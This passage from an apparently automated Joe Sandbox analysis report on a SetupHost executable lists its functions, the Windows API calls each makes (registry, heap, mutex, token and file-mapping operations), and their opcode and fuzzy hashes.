                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: 49567e59ab5f2a7994c0db3d78649a92d914e56891bfa35d4e68c66e429469ac
                                                                                                                        • Instruction ID: c9ee77704e29dcdb7c1b5e9e0f224cecf1de6ed324e9c7454aaf2497cd7dcb51
                                                                                                                        • Opcode Fuzzy Hash: 49567e59ab5f2a7994c0db3d78649a92d914e56891bfa35d4e68c66e429469ac
                                                                                                                        • Instruction Fuzzy Hash: 9411CE3170030C9FCB25AAB6C894B3F76A9DBC5744B20002FAB259B341EF799D059698
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD14E: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000), ref: 004FD18D
                                                                                                                          • Part of subcall function 004FD14E: IsWow64Process.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FD194
                                                                                                                          • Part of subcall function 004FD14E: GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 004FD19E
                                                                                                                          • Part of subcall function 004FD14E: RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 004FD210
                                                                                                                        • RegSetKeySecurity.ADVAPI32(00000000,00000004,00000000,?,?,00000000,00000000,?,00000000), ref: 004FB31D
                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FB34D
                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FB35C
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseProcess$CurrentErrorFreeLastLocalSecurityWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3952319208-0
                                                                                                                        • Opcode ID: 033241421a6bd9d81dbb686b4c37c82f828b19feb53dcfc603e5b56d09d45ded
                                                                                                                        • Instruction ID: 4cef91031e7f99488a9ed450cc9ffbe62eb8a733a5a1981e01d1662ac8672a32
                                                                                                                        • Opcode Fuzzy Hash: 033241421a6bd9d81dbb686b4c37c82f828b19feb53dcfc603e5b56d09d45ded
                                                                                                                        • Instruction Fuzzy Hash: 1F11CB31A4420CEBDF119B99CC0DBBFB7B6EBC1305F24405AE60162290D7784E06DB55
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 747782440-0
                                                                                                                        • Opcode ID: 9ce635fc9e69a2769a1f77cc119cba4d3e6cc6e8af025d5c7f08e5beb520e809
                                                                                                                        • Instruction ID: 10ae341b8310d80c4a523f33b4ceb443bac0e294b8627c6bf8d418d8f8934406
                                                                                                                        • Opcode Fuzzy Hash: 9ce635fc9e69a2769a1f77cc119cba4d3e6cc6e8af025d5c7f08e5beb520e809
                                                                                                                        • Instruction Fuzzy Hash: F12192B59006169BCB08DF94D855AEEBBB8FF44704F10852AF9419B351DBB0DA05CFD4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FC7BE: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?), ref: 004FC90E
                                                                                                                          • Part of subcall function 004FC7BE: HeapFree.KERNEL32(00000000), ref: 004FC915
                                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,00000000,?,00000000,Tel#Asmv,?,?,?,?,004F8C9B,?,00000000,00000000), ref: 004F9AE3
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcessmemcpy
                                                                                                                        • String ID: Tel#Asmv
                                                                                                                        • API String ID: 993092371-2294149968
                                                                                                                        • Opcode ID: 0eb6d58830fa03d831a66d2cfcb9c77943247600fde16e7bf8e1d3432f19905c
                                                                                                                        • Instruction ID: 1b6b20f430a2cace138e556ca340a5d17f05d8ad83743a0b6f463f569daefdbd
                                                                                                                        • Opcode Fuzzy Hash: 0eb6d58830fa03d831a66d2cfcb9c77943247600fde16e7bf8e1d3432f19905c
                                                                                                                        • Instruction Fuzzy Hash: 2701C071B00929A7CB15EB56C891E6EB769AFC4754710012FEA058B351DF78AD02C7D8
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00541F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                          • Part of subcall function 00541F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                          • Part of subcall function 00541F8C: GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                          • Part of subcall function 00541F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,00000000,08000004,00000000,?,?), ref: 0054283E
                                                                                                                        • GetLastError.KERNEL32 ref: 0054285C
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize$Allocate$CurrentErrorLastOpenProcessThreadToken$CreateDescriptorFileMappingSecurity
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2809032385-0
                                                                                                                        • Opcode ID: bd35c31298798a61970a29259a0ccaa3ee728d588ee8d53a282db31fcba408c6
                                                                                                                        • Instruction ID: 82a03fdac0cbaf493ece0473740882afc0c1088fa42b97d3188d01a4aa6aa63d
                                                                                                                        • Opcode Fuzzy Hash: bd35c31298798a61970a29259a0ccaa3ee728d588ee8d53a282db31fcba408c6
                                                                                                                        • Instruction Fuzzy Hash: 93018437A00329ABCB109FF99C44AEEBFA4FB98765F504128B915E3180D7349904CBA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00541F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                          • Part of subcall function 00541F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                          • Part of subcall function 00541F8C: GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                          • Part of subcall function 00541F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 005427D3
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005427E8
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize$Allocate$CurrentOpenProcessThreadToken$CreateDescriptorErrorLastMutexObjectSecuritySingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3485390411-0
                                                                                                                        • Opcode ID: fa1380121786b4cd6002b6de61984a9bb4a9c548f0d4522da9fba8728c468431
                                                                                                                        • Instruction ID: 907ac9d4bd0d17a0586142ac98e7a2a670f2145f74d7890875d0b733a0ec961e
                                                                                                                        • Opcode Fuzzy Hash: fa1380121786b4cd6002b6de61984a9bb4a9c548f0d4522da9fba8728c468431
                                                                                                                        • Instruction Fuzzy Hash: 1AF09636900639A7CB219B559C04AEDBB74FF84725F154115FC10B3280DB788A45CBE1
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,?), ref: 00542332
                                                                                                                        • GetLastError.KERNEL32 ref: 00542340
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: 69824743ea8c631a75184c4503dbb90db2496bcade9f2df512e6489e432b47de
                                                                                                                        • Instruction ID: beba942eec7318c0c4749a27776ea58fcf166e043bd3416f0989d480c5452326
                                                                                                                        • Opcode Fuzzy Hash: 69824743ea8c631a75184c4503dbb90db2496bcade9f2df512e6489e432b47de
                                                                                                                        • Instruction Fuzzy Hash: 91F030B691022CBF8B14CFB4EC498DE7FB8EB49361F104615FC16D3290E6709E00DAA0
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: BreakCloseDebugHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 212039098-0
                                                                                                                        • Opcode ID: bed914920b4b6f13a5b842f6faa5817c00e637a7d71ae608f2737e321146ec96
                                                                                                                        • Instruction ID: 4973505fa9f2320dd2c6004a08b2b38d90a37e97657d199d2638c90a2fca26b1
                                                                                                                        • Opcode Fuzzy Hash: bed914920b4b6f13a5b842f6faa5817c00e637a7d71ae608f2737e321146ec96
                                                                                                                        • Instruction Fuzzy Hash: 06C08C3100820CA787001B62FC0C8467E5CEAA4362B008020F80581020DB328811E961
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0054290C: GetVersion.KERNEL32 ref: 0054294F
                                                                                                                          • Part of subcall function 0054290C: GetModuleHandleW.KERNEL32(kernel32), ref: 005429C3
                                                                                                                          • Part of subcall function 0054290C: GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 005429D3
                                                                                                                          • Part of subcall function 0054290C: memset.MSVCRT ref: 00542A87
                                                                                                                          • Part of subcall function 0054290C: ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00542AA0
                                                                                                                          • Part of subcall function 0054290C: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00542AB3
                                                                                                                          • Part of subcall function 0054290C: FreeLibrary.KERNEL32(00000000), ref: 00542AC8
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000054,033264D0,00000000,0053FBAF), ref: 005445D7
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 005445DE
                                                                                                                          • Part of subcall function 00542D3B: __EH_prolog3.LIBCMT ref: 00542D42
                                                                                                                          • Part of subcall function 00542D3B: GetProcessHeap.KERNEL32(00000000,00000018,00000008,005445EF), ref: 00542D83
                                                                                                                          • Part of subcall function 00542D3B: HeapAlloc.KERNEL32(00000000), ref: 00542D8A
                                                                                                                          • Part of subcall function 00542D3B: GetProcessHeap.KERNEL32(00000000,00000018), ref: 00542DC1
                                                                                                                          • Part of subcall function 00542D3B: HeapAlloc.KERNEL32(00000000), ref: 00542DC8
                                                                                                                          • Part of subcall function 00542D3B: RaiseException.KERNEL32(C0000025,00000001,00000000,00000000), ref: 00542E2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess$Library$AddressEnvironmentExceptionExpandFreeH_prolog3HandleLoadModuleProcRaiseStringsVersionmemset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3155722559-0
                                                                                                                        • Opcode ID: ae78a715a66e188448fa70d5b2a1c5e6852cbbd2b7428a7deaced4be40da248f
                                                                                                                        • Instruction ID: d66be4f4c9f191a2c2e3939d2574536460900571aba8dde1c071f656d423ec29
                                                                                                                        • Opcode Fuzzy Hash: ae78a715a66e188448fa70d5b2a1c5e6852cbbd2b7428a7deaced4be40da248f
                                                                                                                        • Instruction Fuzzy Hash: DCF0E572748632235A2962765C2DBFF4D8D7FD1B19B464529B805D3180DE50CC0289B4
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0054DF1B
                                                                                                                          • Part of subcall function 0054DD36: __EH_prolog3.LIBCMT ref: 0054DD3D
                                                                                                                          • Part of subcall function 004F8AF9: GetProcessHeap.KERNEL32(00000000,?,?,?,004FB826,?,?,?,00000000), ref: 004F8B0A
                                                                                                                          • Part of subcall function 004F8AF9: HeapFree.KERNEL32(00000000,?,004FB826,?,?,?,00000000), ref: 004F8B11
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2588364637-0
                                                                                                                        • Opcode ID: 37c313a7ad22e2af884ae11ad90ac0da0f11f123ec05b90f70e9c595490ecbaf
                                                                                                                        • Instruction ID: 95c81e2b945e9275baf61a53f12ba059a71e4557643f0d50aeeaa5ef47fd3804
                                                                                                                        • Opcode Fuzzy Hash: 37c313a7ad22e2af884ae11ad90ac0da0f11f123ec05b90f70e9c595490ecbaf
                                                                                                                        • Instruction Fuzzy Hash: DF810570D00209DBDF19DFA5D896BEEBBB1BF44308F14402EE516AB290DB789E48CB54
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0054DD3D
                                                                                                                          • Part of subcall function 0054D8F8: __EH_prolog3.LIBCMT ref: 0054D8FF
                                                                                                                          • Part of subcall function 0054DC16: __EH_prolog3_GS.LIBCMT ref: 0054DC20
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$H_prolog3_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4240126716-0
                                                                                                                        • Opcode ID: 65235939210ea4fece72ea1f941d7e33e04fbed8e763c3478536958109bb72d8
                                                                                                                        • Instruction ID: 8c0a65d0c300111221f9837ae86997e11533d69a220776fba3d1c783a71aff4b
                                                                                                                        • Opcode Fuzzy Hash: 65235939210ea4fece72ea1f941d7e33e04fbed8e763c3478536958109bb72d8
                                                                                                                        • Instruction Fuzzy Hash: 0F51D8B0E0161A8BCF19DFA9D5916EDBBF1BF98308F14402EE905AB341EB759D04CB64
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 431132790-0
                                                                                                                        • Opcode ID: b84de9d525eb0476238b1a1f736e67d7aa452ed8ed6d0e2bcf88bbb055ec1992
                                                                                                                        • Instruction ID: e391bfa7e88125672c9b2629fed9d0f32f13fc5489737539d3340699f9432106
                                                                                                                        • Opcode Fuzzy Hash: b84de9d525eb0476238b1a1f736e67d7aa452ed8ed6d0e2bcf88bbb055ec1992
                                                                                                                        • Instruction Fuzzy Hash: EF116631A0052E8BCF06AF64C4546BE7762EFC4364B29801FEA165F340DF389D029B89
                                                                                                                        APIs
                                                                                                                        • RegSetValueExW.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000001,00000000,00000000,?,?,0054A53E), ref: 00548D30
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 31141da64fb43e1edcaf6f559dfd07fb4df36776a9ce948dd724d250f8be0c1a
                                                                                                                        • Instruction ID: f216df7fa804b35661f36be6027f7fd4e62cb961f2d656fb9744f1de329a4402
                                                                                                                        • Opcode Fuzzy Hash: 31141da64fb43e1edcaf6f559dfd07fb4df36776a9ce948dd724d250f8be0c1a
                                                                                                                        • Instruction Fuzzy Hash: D501D431E01114BBCB10AB699845AFFBBFDFB94704F10856AE406DB291EA749D4097A4
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,?,00000000,?,?,00000000), ref: 005428C8
                                                                                                                          • Part of subcall function 00541F8C: InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                          • Part of subcall function 00541F8C: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                          • Part of subcall function 00541F8C: OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                          • Part of subcall function 00541F8C: GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                          • Part of subcall function 00541F8C: GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                          • Part of subcall function 00541F8C: OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize$Allocate$CurrentOpenProcessThreadToken$CreateDescriptorErrorFileLastSecurity
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 720879468-0
                                                                                                                        • Opcode ID: abb527c72aa6ecb46476e6bf059608e9ec7008e9a516777957541512de32643f
                                                                                                                        • Instruction ID: 8dcd58418d239e31421f285847504381a7a504cdf3b5ba12ada4b227645a5c73
                                                                                                                        • Opcode Fuzzy Hash: abb527c72aa6ecb46476e6bf059608e9ec7008e9a516777957541512de32643f
                                                                                                                        • Instruction Fuzzy Hash: 69F0CD36800228ABDF219FA5CC09ADEBF79FF88750F008019FE10A3250DB309A55CBD0
                                                                                                                        APIs
                                                                                                                        • RegGetValueW.KERNEL32(80000002,?,00000000,00010010,00000000,00000003,00000000,00000003,?,0054AD43,Software\Policies\Microsoft\Windows\DataCollection,AllowTelemetry,00000000,?), ref: 0054AA7E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 080ae95ebaa34547d01eba53f8fa0db0ece141975b176219161109780c255803
                                                                                                                        • Instruction ID: fbbf6404c2a5dd84966cfaaf65c5f0c4abe620c1269451f24ead584cf1237683
                                                                                                                        • Opcode Fuzzy Hash: 080ae95ebaa34547d01eba53f8fa0db0ece141975b176219161109780c255803
                                                                                                                        • Instruction Fuzzy Hash: 09E0C2B514020CBAD7118B42CC05FEB3AECA744754F1084047640D5190C6B5DA04A774
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,004E9438), ref: 004F8F23
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: d3239fe714c1306fb4576aab6db79cd8ce84c081e820b935e45f8bab1f4cb867
                                                                                                                        • Instruction ID: ec9444cb34d0926427a0ae0fc6849612a91ae9581fb9c25348b645c034bdde68
                                                                                                                        • Opcode Fuzzy Hash: d3239fe714c1306fb4576aab6db79cd8ce84c081e820b935e45f8bab1f4cb867
                                                                                                                        • Instruction Fuzzy Hash: 99D0A7323382180A9B7C77352C0513B25A1DA403743350B2FF12EC11D0DD3DCC425114
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004E669A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378638983-0
                                                                                                                        • Opcode ID: 4f7e07d736d7583cfef3b1d65391126bc5651fec4e23adf71797718ae7a2b532
                                                                                                                        • Instruction ID: 7a1d8e39281162bbd28d2ee23b26ca15eaf36a121111a91e2005285461d192f7
                                                                                                                        • Opcode Fuzzy Hash: 4f7e07d736d7583cfef3b1d65391126bc5651fec4e23adf71797718ae7a2b532
                                                                                                                        • Instruction Fuzzy Hash: 4DD0173110824CFBCF125F12EC14D7A3FAAAB94362B044165B815491B1DB329831EA54
                                                                                                                        APIs
                                                                                                                        • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 005422F2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileView
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3314676101-0
                                                                                                                        • Opcode ID: 89df03ef2ab743e024238aba8ad1f2e8c1bd4cfaf1549195e0a48d6f888e53e2
                                                                                                                        • Instruction ID: 857a964217e282fb93450f25a62685e40d7465ab248e0e8d91051b45cfc003e4
                                                                                                                        • Opcode Fuzzy Hash: 89df03ef2ab743e024238aba8ad1f2e8c1bd4cfaf1549195e0a48d6f888e53e2
